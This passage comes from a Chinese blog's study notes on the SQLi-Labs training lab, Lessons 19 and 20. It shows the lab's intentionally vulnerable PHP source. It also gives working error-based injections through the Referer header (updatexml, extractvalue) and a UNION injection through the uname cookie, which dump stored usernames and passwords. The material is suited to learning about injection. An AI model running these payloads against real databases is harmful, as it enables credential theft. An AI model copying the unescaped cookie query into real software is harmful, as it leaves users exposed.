"#0000ff" font size = 3 >';echo 'Your Referer is: ' .$uagent;echo "</font>";echo "<br>";print_r(mysql_error());echo "<br><br>";echo '<img src="../images/flag.jpg" />';echo "<br>";}else{echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg" />';echo "</font>"; }}?></font></div></body></html>
从源代码中我们可以看到我们获取到的是HTTP_REFERER,那和less18是基本一致的,我们从referer进行修改
要获取用户名和密码的话,和之前是一样的
' or updatexml(1,concat(0x2b5e,(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)),1) or'
不过这次我们使用另一个函数,
EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串).
作用:从目标XML中返回包含所查询值的字符串
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串).
作用:从目标XML中返回包含所查询值的字符串
' or extractvalue(1,concat(0x2b5e,(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1))) or'
返回的结果是一样的,这里就不贴图了。
Less-20基于错误的cookie头部POST注入
①先打开网页查看 Welcome Dhakkan
②查看源码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-20 Cookie Injection- Error Based- string</title></head><body bgcolor="#000000"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);if(!isset($_COOKIE['uname'])){//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome <font color='#FF0000'> Dhakkan </font><br></div>";echo "<div align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";echo "<div style='padding-top:10px; font-size:15px;'>"; echo "<!--Form to post the contents -->";echo '<form action=" " name="form1" method="post">';echo ' <div style="margin-top:15px; height:30px;">Username : ';echo ' <input type="text" name="uname" value=""/> </div>'; echo ' <div> Password : ';echo ' <input type="text" name="passwd" value=""/></div></br>';echo ' <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';echo '</form>';echo '</div>';echo '</div>';echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';echo '<font size="3" color="#FFFF00">';echo '<center><br><br><br>';echo '<img src="../images/Less-20.jpg" />';echo '</center>';function check_input($value){if(!empty($value)){$value = substr($value,0,20); // truncation (see comments)}if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled{$value = stripslashes($value);}if (!ctype_digit($value)) // Quote if not a number{$value = "'" . mysql_real_escape_string($value) . "'";}else{$value = intval($value);}return $value;}echo "<br>";echo "<br>";if(isset($_POST['uname']) && isset($_POST['passwd'])){$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysql_query($sql);$row1 = mysql_fetch_array($result1);$cookee = $row1['username'];if($row1){echo '<font color= "#FFFF00" font size = 3 >';setcookie('uname', $cookee, time()+3600);header ('Location: index.php');echo "I LOVE YOU COOKIES";echo "</font>";echo '<font color= "#0000ff" font size = 3 >';//echo 'Your Cookie is: ' .$cookee;echo "</font>";echo "<br>";print_r(mysql_error());echo "<br><br>";echo '<img src="../images/flag.jpg" />';echo "<br>";}else{echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg" />';echo "</font>"; }}echo "</font>"; echo '</font>';echo '</div>';}else{if(!isset($_POST['submit'])){$cookee = $_COOKIE['uname'];$format = 'D d M Y - H:i:s';$timestamp = time() + 3600;echo "<center>";echo '<br><br><br>';echo '<img src="../images/Less-20.jpg" />';echo "<br><br><b>";echo '<br><font color= "red" font size="4">';echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];echo "</font><br>";echo '<font color= "cyan" font size="4">';echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];echo "</font><br>";echo '<font color= "#FFFF00" font size = 4 >';echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";echo '<font color= "orange" font size = 5 >';echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);echo "<br></font>";$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";$result=mysql_query($sql);if (!$result) { die('Issue with your mysql: ' . mysql_error()); }$row = mysql_fetch_array($result);if($row){ echo '<font color= "pink" font size="5">'; echo 'Your Login name:'. $row['username']; echo "<br>";echo '<font color= "grey" font size="5">'; echo 'Your Password:' .$row['password']; echo "</font></b>";echo "<br>";echo 'Your ID:' .$row['id']; }else{echo "<center>";echo '<br><br><br>';echo '<img src="../images/slap1.jpg" />';echo "<br><br><b>";//echo '<img src="../images/Less-20.jpg" />';}echo '<center>';echo '<form action="" method="post">';echo '<input type="submit" name="submit" value="Delete Your Cookie!" />';echo '</form>';echo '</center>';}else{echo '<center>';echo "<br>";echo "<br>";echo "<br>";echo "<br>";echo "<br>";echo "<br>";echo '<font color= "#FFFF00" font size = 6 >';echo " Your Cookie is deleted";setcookie('uname', $row1['username'], time()-3600);header ('Location: index.php');echo '</font></center></br>';}echo "<br>";echo "<br>";//header ('Location: main.php');echo "<br>";echo "<br>";//echo '<img src="../images/slap.jpg" /></center>';//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'Cookie:'.$cookee."\n");fclose($fp);}?></body></html>
分析代码,首先判断有无cookie,没有的话,查询出来再设置cookie,若cookie存在,又分两种情况:
第一种情况,你登陆过,cookie还有效,你没按删除cookie的按钮,那么他就输出各种信息,包括删除cookie的按钮
第二种情况,你按了删除cookie的按钮,后台就把cookie的时间设置为过期的时间,那么cookie就被删除了
关键代码:
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
那么久不废话了,一次性搞定吧
-admin' union select 1,group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users--+
如果有什么问题的话,欢迎在评论区回复。
查考链接:
http://blog.csdn.net/u012763794/article/details/51361152
http://www.cnblogs.com/lcamry/p/5763024.html
阅读全文
0 0
- SQLi-Labs 学习笔记(Less 11-20)
- SQLi-Labs 学习笔记(Less 1-10)
- SQLi-Labs 学习笔记(Less 21-30)
- SQLi-Labs 学习笔记(Less 31-40)
- SQLi-Labs 学习笔记(Less 41-50)
- SQLi-Labs 学习笔记(Less 51-65)
- SQLi-Labs学习笔记
- sqli-labs less1 学习笔记
- sqli-labs ---- Less-2
- sqli-labs ---- Less-7
- [sqli-labs]Less-1(明注)
- Sqli-labs学习SQL注入-Lesson 11-20总结
- sqli-labs ---- Less-5 & Less-6
- sqli-labs学习记录(一)
- sqli-labs学习记录(二)
- sqli-labs学习记录(三)
- sqli-labs学习记录(四)
- sqli-labs学习记录(五)
- Android之屏幕适配
- File文件
- ubuntu网站服务器环境搭建
- Shell脚本基础10-基本的数学运算
- 去除手机端页面滚动条
- SQLi-Labs 学习笔记(Less 11-20)
- joc3 例子
- java之--把jython得到的基本数据类型转换成Java数据类型
- Spring boot出现java.awt.HeadlessException的解决办法
- 2017-5-20实训的第六天
- [李景山php] 深入理解PHP内核[读书笔记]--第五章:类和面向对象 --类的继承,多态及抽象类
- 解决mysql无法插入中文数据及插入后显示乱码的问题
- 自学PHP与培训PHP的到底有多大的差距?
- springboot整合redis缓存